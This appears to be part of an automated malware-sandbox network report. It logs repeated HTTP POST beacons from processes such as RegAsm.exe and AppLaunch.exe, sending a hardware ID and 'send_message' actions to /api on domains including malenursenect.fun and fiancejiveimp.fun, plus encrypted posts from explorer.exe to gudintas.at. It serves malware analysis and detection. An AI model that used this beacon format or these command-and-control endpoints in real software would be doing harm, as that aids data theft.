                                                                    Oct 3, 2023 09:55:29.562633991 CEST6519OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:29.563908100 CEST6520OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:30.914094925 CEST6527INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=2g1l9r1knr921u03tnh441i2pc; expires=Sat, 27 Jan 2024 01:42:09 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:30 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5%2Fa2VyXPeJBizN3Xw8yxDaXDDviiThoJo3unfcCfhcLYu5sQzfuG%2FILhB0pvoynxSAoQ%2FIuW9wGguRtq%2B7XkIFtYqQ4out%2FuhZCkNaVbZWYKYG9jO5rD6MoOSR3clu4kBBdoMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f85fe90084e-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:30.914134026 CEST6527INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    59192.168.2.349894172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:30.076447964 CEST6522OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:30.076858997 CEST6522OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:30.450153112 CEST6524INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=tlc4e4vmbncetl700jk61pin3f; expires=Sat, 27 Jan 2024 01:42:09 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:30 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7DB1WD3%2FUYtFeM%2B9Tz7LEvSKOXS%2BpRfxIk3trPIftLXg06aIt4EwzQhdzAQ2twMRD%2F%2B5HDolyxtN1NCHPMTmU9bsq3i5K3Z1kaHP7mTvgiObHfVdBxALYSQqlnlMDyQfq36kbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f893c9d20b7-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:30.450213909 CEST6524INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.349809186.147.159.1980C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:29.135386944 CEST1546OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://ajhuadbjy.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 143
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:29.135423899 CEST1546OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 78 05 e6 e5
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vuxEfC[*:yaY)Weg]M4&%|
                                                                    Oct 3, 2023 09:54:29.710017920 CEST1547INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:29 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    60192.168.2.349895104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:30.673625946 CEST6524OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:30.674078941 CEST6525OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:30.952984095 CEST6528INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=fv8u693k1k04qcj73te4vi7u1u; expires=Sat, 27 Jan 2024 01:42:09 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:30 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=emTuCXEVZ3l4x3WPDLa8EmOnrmlvdAdLE6b0hGhENUTcACtyMkF%2F8KPbpWEya14CAficcVqmz0iVVqt2LYyjphg0o9xo4Ns1IlR7PlXn6TaNypDpjF7mK%2BEzxq5a%2BzdOfrfvAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f8ced755716-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:30.953022957 CEST6528INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    61192.168.2.349897104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:31.148581028 CEST6529OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:31.149017096 CEST6530OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:31.550868034 CEST6538INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=32fs6i5lbtckt7hbfvcoj85hvi; expires=Sat, 27 Jan 2024 01:42:10 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:31 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xYFHFkjQr%2FmPZ0lrCCx0%2BTbuHwF0uHUbV8kbZLUizs7j9F8JfCtVzHfMNDRkJiOfuoHUapbqtUamKs5Pp0RixEaL36EHRt1iDFaUKzaC3w3qn9fLFmlPYea3bxmkF7YDp%2FZ3dA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f8fee3b8f1a-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:31.550925016 CEST6538INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    62192.168.2.349898172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:31.166299105 CEST6530OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:31.166668892 CEST6531OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:31.632762909 CEST6539INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=7sm109mr3bia1acoflmglscvjc; expires=Sat, 27 Jan 2024 01:42:10 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:31 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FPwiUPDBIrJYAH%2BSeK88YLu58IcfCbOnUgeK6jDWPctOIv6bkfQQFkMtvqUFDlHe1Wf652u1etuiyae6m37RNAZggVavXk0f1HiAw7cHJ%2FRCpGXPoSo9tAnyxA4iIOvRWPsa1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f900b2028a0-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:31.632834911 CEST6539INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    63192.168.2.349899172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:31.787524939 CEST6540OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:31.787950993 CEST6541OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:32.229742050 CEST6542INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=58i0c48678kgb12h75addptvpm; expires=Sat, 27 Jan 2024 01:42:11 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:32 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a%2Bx5nR%2BG9drche5rndAa9d7mq8moUylW4jLrUmYl7gt7euQKJNh8yl3ys8RHA8qGcQNcCBt%2BWQ5%2F0JxJ3AXx3GaGHF9M6G4BwfIVq981m1k1snI1oh4Vqaess3i0urousQtlpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f93ed301fdd-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:32.229799986 CEST6542INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    64192.168.2.349900104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:32.460652113 CEST6543OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:32.460999012 CEST6543OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:32.824086905 CEST6545INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=i5908pg2rbtp4p5srt73lrbrf5; expires=Sat, 27 Jan 2024 01:42:11 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:32 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DNwjtbBxqjWM6MUSw2Hmv3tfvANxklG208nyFSK86aac7pk1bumeae9v5vhvhQlDw2odJNkP0YjkpA5EtPIF6XMgvr2AP0eSncBXFXCOztiTIeja5gMx2PkobaNMr3nvfnRZMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f98193b0800-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:32.824157000 CEST6545INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    65192.168.2.349901104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:33.060827971 CEST6545OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:33.061326981 CEST6546OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:33.665677071 CEST6549INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=mkajoq7sun746huqi45lqdt3it; expires=Sat, 27 Jan 2024 01:42:12 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:33 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eGgi5s3Ks9SMA8ME%2BR9cwOFZLa11eTh1WLK7H28Qu3wFIQ8E8lzYUSvKMTi6QjssnHNr9XH3X5GLFvGwr86JUo%2Fg%2FcjavjoCrGwZmooz21kx%2FKBD32MPULh7OiCKzZsoeXJgGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f9bdebe3964-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:33.665739059 CEST6549INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    66192.168.2.349902104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:33.524224043 CEST6547OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:33.524410009 CEST6548OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:33.862191916 CEST6551INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
